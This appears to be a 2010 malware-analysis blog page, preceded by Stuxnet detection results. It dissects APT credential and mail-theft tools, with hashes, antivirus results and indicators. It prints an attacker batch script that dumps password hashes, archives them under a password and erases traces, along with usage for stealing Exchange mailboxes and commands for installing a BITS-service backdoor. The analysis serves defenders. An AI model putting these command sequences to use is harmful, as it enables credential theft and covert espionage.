Ikarus     T3.1.1.84.0     2010.07.16     Trojan-Dropper.Win32.Stuxnet
Kaspersky     7.0.0.125     2010.07.16     Trojan-Dropper.Win32.Stuxnet.d
McAfee     5.400.0.1158     2010.07.16     Stuxnet
McAfee-GW-Edition     2010.1     2010.07.16     Heuristic.LooksLike.Win32.NewMalware.B
Microsoft     1.6004     2010.07.16     TrojanDropper:Win32/Stuxnet.A
NOD32     5283     2010.07.16     Win32/Stuxnet.A
nProtect     2010-07-16.01     2010.07.16     Trojan.Agent.AQCK
PCTools     7.0.3.5     2010.07.16     Rootkit.Stuxnet
Prevx     3.0     2010.07.16     Medium Risk Malware
Sophos     4.55.0     2010.07.16     Troj/Stuxnet-A
Sunbelt     6591     2010.07.16     Trojan.Win32.Generic!BT
Symantec     20101.1.1.7     2010.07.16     Trojan.Gen
VBA32     3.12.12.6     2010.07.16     Trojan-Spy.0485
VirusBuster     5.0.27.0     2010.07.16     Trojan.DR.Stuxnet.C
Additional information
File size: 517632 bytes
MD5   : 74ddc49a7c121a61b8d06c03f92d0c13



 Microsoft Malware Protection Center
Trojan:WinNT/Stuxnet.A
Aliases
      Win32/PcClient.ACH (CA)


Alert Level (?) Severe
Released: Jul 07, 2010
Summary
Trojan:WinNT/Stuxnet.A is a trojan component installed by TrojanDropper:Win32/Stuxnet.A that injects code into the running process LSASS.EXE.

Symptoms
System changes
The following system changes may indicate the presence of this malware:

    *
      The presence of the following files:
      \mrxcls.sys
    *
      The presence of the following registry keys:
      HKLM\SYSTEM\CurrentControlSet\Services\MRxCls

Technical Information (Analysis)
Trojan:WinNT/Stuxnet.A is a trojan component installed by TrojanDropper:Win32/Stuxnet.A that injects code into the running process LSASS.EXE.
Installation
Trojan:WinNT/Stuxnet.A may be present as the following file:

\Drivers\mrxcls.sys

Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the System folder for Windows 2000 and NT is C:\Winnt\System32; and for XP, Vista, and 7 is C:\Windows\System32.

The trojan component runs as a hidden service named "MRXCLS" via a registry modification as in the following example:

Sets value: "Description"
With data: "MRXCLS"
Sets value: "DisplayName"
With data: "MRXCLS"
Sets value: "ErrorControl"
With data: "0"
Sets value: "Group"
With data: "Network"
Sets value: "ImagePath"
With data: "\??\%windir%\system32\Drivers\mrxcls.sys"
Sets value: "Start"
With data: "1"
Sets value: "Type"
With data: "1"
Sets value: "Data"
With data: ""
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\MRxCls
Payload
Injects code
Trojan:WinNT/Stuxnet.A is capable of injecting malicious code into the running process "LSASS.EXE" based on data written in the registry or from other TrojanDropper:Win32/Stuxnet.A components such as the following:

%windir%\inf\mdmcpq3.pnf
%windir%\inf\mdmeric3.pnf
%windir%\inf\oem6c.pnf
%windir%\inf\oem7a.pnf

Analysis by Francis Allan Tan Seng 

Friday, July 16, 2010

APT malware #2. Anatomy of a mail / data theft attack. (wiam.exe and others)

These days I see a spike in the number of searches for WIAM.EXE, which is listed as one of the file available for download upon request. I thought I would add a few more details on this file and files associated with it.

While there can be any kind of file named wiam.exe, chances are that your file is similar or identical to the one described below. This file is part malware kind frequently referred to as APT malware. If you find this file on a system, look for others listed below. And yes, as you already guessed, you have a Problem.

According to Mandiant 
"The Advanced Persistent Threat (APT) is a sophisticated and organized cyber attack to access and steal information from compromised computers. The intruders responsible for the APT attacks target the Defense Industrial Base (DIB), financial industry, manufacturing industry, and research industry. The attacks used by the APT intruders are not very different from any other intruder. The main differentiator is the APT intruder’s perseverance and resources. They have malicious code (malware) that circumvents common safeguards such as anti-virus and they tend to generate more activity than wanton “drive by hacks” on the Internet. The intruders also escalate their tools and techniques as a victim firm’s capability to respond improves. Therefore, the APT attacks present different challenges than addressing common computer security breaches."
Download all malware files mentioned below as a password protected archive (contact me if you need the password)
Download additional files mentioned in the update July 16, 2010

 Update: scroll down to see recent additions marked  Update July 16, 2010
 
1. wiam.exe + iam.dll  
The file itself is not really a trojan but a cli tool, part of the modified pass-the-hash toolkit (PSH toolkit) released by Core Technologies.
"The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!)" See Modifying Windows NT Logon Credential
PSH original toolkit files
File: iam.exe  Size: 90112 MD5:  1FF020D6F41CBF73ADF3AF2DE9A08CFD
File: iamdll.dll  Size: 49152  MD5:  DAB43935D17725024CC5EF2DD35CBEDD

http://www.virustotal.com/analisis/8f1f0eb6927d8eb331b36f2f5d0c7b434e2473332dea4acde1d6e96fd758731a-1275930386
 File iam.exe received on 2010.06.07 17:06:26 (UTC)
Result: 5/41 (12.2%)
Authentium    5.2.0.5    2010.06.07    W32/Heuristic-KPP!Eldorado
F-Prot    4.6.0.103    2010.06.07    W32/Heuristic-KPP!Eldorado
Panda    10.0.2.7    2010.06.06    Suspicious file
PCTools    7.0.3.5    2010.06.07    Hacktool.PTHToolkit
Symantec    20101.1.0.89    2010.06.07    Hacktool.PTHToolkit
File size: 90112 bytes
MD5...: 1ff020d6f41cbf73adf3af2de9a08cfd

File iamdll.dll received on 2010.06.07 17:26:26 (UTC)
http://www.virustotal.com/analisis/16f480fcb042e07d89f2a384b52bfce9716c114b374bc8f81a95386651585b65-1275931586
Result: 0/41 (0%)
Additional information
File size: 49152 bytes
MD5...: dab43935d17725024cc5ef2dd35cbedd


=============================
Modified kit
File: wiam.exe  Size: 40960  MD5:  F49CB9A7006FB34E5B5A81AE32358C77
File: iam.dll   Size: 36864  MD5:  30D50F856EFE9BCF7D0A859154CB2F92


http://www.virustotal.com/analisis/bc1c5911eb56fd92bb36507e694ee0629cf114c4ba2729c49b1cd3973e44c125-1275930460
 File wiam.exe received on 2010.06.07 17:07:40 (UTC)
Result: 22/41 (53.66%) 
a-squared    5.0.0.26    2010.06.07    Trojan.Hijacker!IK
AhnLab-V3    2010.06.06.00    2010.06.06    Malware/Win32.Trojan Horse
AntiVir    8.2.2.6    2010.06.07    TR/Hijacker.Gen
Authentium    5.2.0.5    2010.06.07    W32/Heuristic-KPP!Eldorado
Avast    4.8.1351.0    2010.06.07    Win32:Trojan-gen
Avast5    5.0.332.0    2010.06.07    Win32:Trojan-gen
BitDefender    7.2    2010.06.07    Application.Generic.248976
CAT-QuickHeal    10.00    2010.06.07    Trojan.Agent.ATV
Comodo    5019    2010.06.07    UnclassifiedMalware
eSafe    7.0.17.0    2010.06.06    Win32.TRHijacker
F-Prot    4.6.0.103    2010.06.07    W32/Heuristic-KPP!Eldorado
F-Secure    9.0.15370.0    2010.06.07    Application.Generic.248976
GData    21    2010.06.07    Application.Generic.248976
Ikarus    T3.1.1.84.0    2010.06.07    Trojan.Hijacker
McAfee    5.400.0.1158    2010.06.07    Generic.dx!mfu
McAfee-GW-Edition    2010.1    2010.06.07    Generic.dx!mfu
NOD32    5180    2010.06.07    probably a variant of Win32/Agent
Panda    10.0.2.7    2010.06.06    Trj/CI.A
PCTools    7.0.3.5    2010.06.07    Trojan.Generic
Sunbelt    6416    2010.06.07    Trojan.Win32.Generic!BT
Symantec    20101.1.0.89    2010.06.07    Trojan Horse
VirusBuster    5.0.27.0    2010.06.07    Trojan.Hijacker.BUO
Additional information
File size: 40960 bytes
MD5...: f49cb9a7006fb34e5b5a81ae32358c77

File iam.dll received on 2010.06.07 17:22:42 (UTC)
Result: 0/41 (0%)
Additional information
File size: 36864 bytes
MD5...: 30d50f856efe9bcf7d0a859154cb2f92

 You can compare them in a hex editor, the files are not identical but here are similarities in the strings.

iam.exe file from Core

wiam.exe strings (partial, just for comparison)

The files can be found in various subdirectories of

\%userprofle%\local settings\temp
C:\windows\ime\imejp
C:\windows\system32
 C:\windows\system32\temp\

If your attackers are sloppy or if you run data recovery/unerase/unformat tools on the affected machine, you may find other tools and files associated with this type of attack.

2. DumpExt.dll, DumpSvc.exe, PWDumpX.exe
 PWDumpX v1.4 - Dumps domain password cache, LSA secrets, password hashes, and password history hashes.
I don't think these files require much analysis, they are part of a well known password stealing application and the results are needed for pass-the-hash exercises described above


3. m.exe

Update: July 16, 2010. 
You may see MAPI.EXE as a variant, which does the same thing (see download link in the beginning of this post)
VT 0/42 
File size: 227840 bytes
MD5   : c57902ace7ff4173ae41f1292ea85e2a
http://www.virustotal.com/analisis/7a85131da877ac43d85315bd736783ebc62ba41625275efc6ee1ee3a1f60f7fd-1278304255





m.exe is a file you may find together with the files listed. This file might be a standalone creation or a derivative of getmail (many thanks to JM for the tip). See the strings below for comparison.

Once user credentials are changed using the psh toolkit described above (wiam.exe+iam.dll), m.exe cli tool can be used to retrieve email messages of the target from an Exchange server. The usage is the following:

Example:%s -s:sn-server1.mailserver.com -u:exuser4 -t:2006-9-25-14 -o:c:\winnt\temp
%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath

One needs to specify user name, server name, date range and location where to save the stolen data.

The email messages will be converted to text and attachments saved in corresponding subfolders. See examples below.

The message formatting will look like this:

From:Jon Doe
To:Jane Smith
Subject:RE: Meeting
Recv Time:08/05/2009 08:27 PM

Hi Jane,

Thanks so much but I will not be able to attend the meeting. 

Best,

Jon
________________________________
From: Jane Smith [mailto:JSmith@company.com]
Sent: Tuesday, August 04, 2009 10:43 AM
To: Jon Doe
Subject: Meeting

Jon, can you join us for the meeting tomorrow?

Thanks
Jane
Until very recently it was 0/41 on VT but now it is 1/41
http://www.virustotal.com/analisis/2903e1865777479f326757ce227711b149a3b893698ec0ad34e3ed0ae3761cc5-1275934263
  File m.exe received on 2010.06.07 18:11:03 (UTC)
Result: 1/41 (2.44%)
McAfee-GW-Edition    2010.1    2010.06.07    Heuristic.BehavesLike.Win32.Backdoor.H
Additional information
File size: 215552 bytes
MD5...: 09e25bb934d8523fccd27b86fbf4f8ce

m.exe strings



getmail.exe strings

 4.r.exe or ntfre.exe or any name
The tools get uploaded as an archive (archive be disguised as a temp file like ~WRD0204.tmp) and the stolen data needs to be compressed before it gets taken out, so there can be any kind of archiver involved These are two examples - same kind of cli WinRAR, just different names
(C) 1993-%d Alexander Roshal
beta
Usage:     rar - -
Usage:     unrar - -
               <@listfiles...>

  a             Add files to archive
 File ntfre.exe received on 2010.06.07 18:28:41 (UTC)
http://www.virustotal.com/analisis/1616612517d98e780666efd5b69b9ac5e94e34a661252198c88f0a2cf589792f-1275935321
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 1/41 (2.44%)
eSafe    7.0.17.0    2010.06.06    Win32.Banker  - not really but they use these in banks too, I am sure (M)
Additional information
File size: 332800 bytes
MD5...: c7e858e4a51ba7d26af9235064988274
  
r.exe is the same MD5 c7e858e4a51ba7d26af9235064988274

5. Batch files to automate the process.
There can be any variety of batch files, their content depends how much typing they don't want to do. Here is an example of a password hash stealing process
Here is an example for pp.bat
cd C:\windows\ime\imejp
ntfre e -p64740629 ~WRD0203.tmp (uncompress ~WRD0203.tmp archive using password 64740629)
del ~WRD0203.tmp (delete the archive)
PWDumpX.exe 127.0.0.1 + +  (dump password hash)
del DumpExt.dll
del DumpSvc.exe
del PWDumpX.exe
del 127.0.0.1-LSASecrets.txt
del 127.0.0.1-PWCache.txt
ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday  C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp
del 127.0.0.1-PWHashes.txt
del ntfre.exe
net use \\127.0.0.1\ipc$ /del
del pp.bat

 ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp
  means the following:
 
-r - add files to archive with all subdirectories  
-m3 - set compression method 3 , which is default (5 is max)
-inul - means suppress messages
ep1  -- means exclude bvase dir name from names
 n* - Uhm, something about specified files not sure
-hphappyday  - set this as archive password 

 6. Backdoor services and files for their installation.
- there are MANY types of services that get modified to serve as backdoors by replacing the legitimate library. I posted a few recent examples before  and  and I will post more  but now I will give one example.


 s.exe

some strings
GetStartupInfoA
cmd /c attrib +h +s qmqrprxy.dll
cmd /c net start bits
cmd /c net stop bits
cmd /c rundll32 qmqrprxy.dll,RundllInstall
qmqrprxy.dll
cmd /c del.bat
del %s
del %s /as
ping 127.0.0.1 -n 3
del.bat
Update July 16, 2010 
Here is a nice recent example for a backdoor service (legitimate library file for a non-essential service gets replaced with a malicious file)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IAS]
"DisplayName"="Authentication Service"
"ObjectName"="LocalSystem"
"Description"="Enables authentication,authorization and accounting of dial-up and VPN users.IAS support the RADIVS protocol"

replaced with ias.dll
File iass.dll received on 2010.07.05 04:11:40 (UTC)
http://www.virustotal.com/analisis/bfaedcb770769f0063a15a429f9e68c12fe0b5e4d13d1850a31c32a1177fb3b1-1278303100
Result: 18/41 (43.90%)
a-squared 5.0.0.31 2010.07.05 Packer.RLPack!IK
AntiVir 8.2.4.2 2010.07.04 TR/Crypt.XPACK.Gen
Authentium 5.2.0.5 2010.07.04 W32/RLPacked.A.gen!Eldorado
Avast 4.8.1351.0 2010.07.04 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.04 Win32:Malware-gen
AVG 9.0.0.836 2010.07.04 BackDoor.Generic12.BLMD
BitDefender 7.2 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Comodo 5321 2010.07.05 Heur.Pck.RLPack
F-Prot 4.6.1.107 2010.07.04 W32/RLPacked.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
GData 21 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Ikarus T3.1.1.84.0 2010.07.05 Packer.RLPack
McAfee-GW-Edition 2010.1 2010.07.04 Heuristic.LooksLike.Win32.Suspicious.C
Microsoft 1.5902 2010.07.03 Backdoor:Win32/Pingbed.A
nProtect 2010-07-04.02 2010.07.04 Gen:Packer.RLPack.D.ai5aaiqnctm
Panda 10.0.2.7 2010.07.04 Suspicious file
Sophos 4.54.0 2010.07.05 Sus/Encpk-MV
TrendMicro 9.120.0.1004 2010.07.05 PAK_Generic.001
Additional information
File size: 16048 bytes
MD5   : 426f6471b612cf7bb32130fee94cf4c3

Other example of a backdoor file, which does not run as a service. It runs as a separate process and  with the same name ccapp.exe, which is a name of Symantec/Norton Antivirus’ real-time scanner.  
ccapp.exe  19/41 FFA85CB60C3572198A520B866FAE8B15
 File ccapp.exe received on 2010.07.05 04:26:40 (UTC)
Result: 19/41 (46.34%)
AhnLab-V3     2010.07.03.00     2010.07.03     Win32/MalPackedB.suspicious
AntiVir     8.2.4.2     2010.07.04     TR/Crypt.ZPACK.Gen
Authentium     5.2.0.5     2010.07.04     W32/Fujack.U
Avast     4.8.1351.0     2010.07.04     Win32:Malware-gen
Avast5     5.0.332.0     2010.07.04     Win32:Malware-gen
AVG     9.0.0.836     2010.07.04     Win32/Virut.Z
BitDefender     7.2     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Comodo     5321     2010.07.05     TrojWare.Win32.TrojanSpy.KeyLogger.~d02
F-Prot     4.6.1.107     2010.07.04     W32/Fujack.U
F-Secure     9.0.15370.0     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
GData     21     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Microsoft     1.5902     2010.07.03     Backdoor:Win32/Pingbed.A
Norman     6.05.10     2010.07.04     Fujack.T
nProtect     2010-07-04.02     2010.07.04     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Panda     10.0.2.7     2010.07.04     Suspicious file
Sunbelt     6544     2010.07.05     Trojan.Crypt.AntiSig.b (v)
Symantec     20101.1.0.89     2010.07.05     Suspicious.MH690.A
ViRobot     2010.7.3.3920     2010.07.04     Backdoor.Win32.IRCBot.35288
VirusBuster     5.0.27.0     2010.07.04     Packed/RLPack
Additional information
File size: 14257 bytes
MD5   : ffa85cb60c3572198a520b866fae8b15
 ------------------------ end of July 16, 2010 update-------------------------

qmqr.dll or qmqrprxy.dll


C:\WINDOWS\system32\qmqrprxy.dll (32768 Bytes.) - qmqrprxy.dll to replace legitimate BITs service file qmgr.dll - in 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters
 
Command sequence:
creates
C:\del.bat (56 Bytes.)
installs 
cmd /c rundll32 qmqrprxy.dll,RundllInstall
restarts BITS
cmd /c net stop bits

cmd /c net start bits 

sets attribute to system hidden
cmd /c attrib +h +s qmqrprxy.dll
cmd /c del.bat    - deletes the batch file


BITS firewall bypass - backdoor - see explanation here New Attack Piggybacks on Microsoft's Patch Service or here  Обход фаеров с использованием BITS 

TCP traffic 58.33.154.102:443
Hostname:    102.154.33.58.broad.xw.sh.dynamic.163data.com.cn
ISP:    ChinaNet Shanghai Province Network
Organization:    ChinaNet Shanghai Province Network
Country:    China
State/Region:    Shanghai
 File qmqrprxy.dll received on 2010.06.07 20:28:13 (UTC)  - originally was 2/41 on VT
http://www.virustotal.com/analisis/a48c83859d3430c6fc5606ba8da4c38353cb1a93cb01e7f53e3122600147cc26-1275942493
Result: 25/41 (60.98%)
a-squared    5.0.0.26    2010.06.07    Trojan-Downloader.Win32.Small!IK
AhnLab-V3    2010.06.06.00    2010.06.06    Win-Trojan/Atraps.32768.N
AntiVir    8.2.2.6    2010.06.07    TR/ATRAPS.Gen
Avast    4.8.1351.0    2010.06.07    Win32:Malware-gen
Avast5    5.0.332.0    2010.06.07    Win32:Malware-gen
AVG    9.0.0.787    2010.06.07    BackDoor.Generic12.KBM
BitDefender    7.2    2010.06.07    Trojan.Generic.2664831
CAT-QuickHeal    10.00    2010.06.07    Trojan.Agent.ATV
Comodo    5020    2010.06.07    TrojWare.Win32.GameThief.Nilage.~CRSH
F-Secure    9.0.15370.0    2010.06.07    Trojan.Generic.2664831
GData    21    2010.06.07    Trojan.Generic.2664831
Ikarus    T3.1.1.84.0    2010.06.07    Trojan-Downloader.Win32.Small
Kaspersky    7.0.0.125    2010.06.07    Backdoor.Win32.Small.iog
McAfee-GW-Edition    2010.1    2010.06.07    Heuristic.BehavesLike.Win32.Downloader.H
Microsoft    1.5802    2010.06.07    TrojanDownloader:Win32/Troxen!rts
NOD32    5180    2010.06.07    a variant of Win32/Agent.WQS
Norman    6.04.12    2010.06.07    W32/Atraps.EZM
nProtect    2010-06-07.01    2010.06.07    Trojan.Generic.2664831
Panda    10.0.2.7    2010.06.07    Trj/CI.A
PCTools    7.0.3.5    2010.06.07    Trojan.ADH
Prevx    3.0    2010.06.07    High Risk Worm
Sunbelt    6416    2010.06.07    Trojan.Win32.Small
Symantec    20101.1.0.89    2010.06.07    Trojan.ADH
TrendMicro    9.120.0.1004    2010.06.07    BKDR_SMALL.LOP
TrendMicro-HouseCall    9.120.0.1004    2010.06.07    BKDR_SMALL.LOP
Additional information
File size: 32768 bytes
MD5...: 03b3cceb253fd782590cf0efafd49d5f

There can be a few other files as well, this is a basic pack that is needed to pull it off. I will be adding more files related to this type of attack and other APT malware but feel free to email me if you have questions or comments.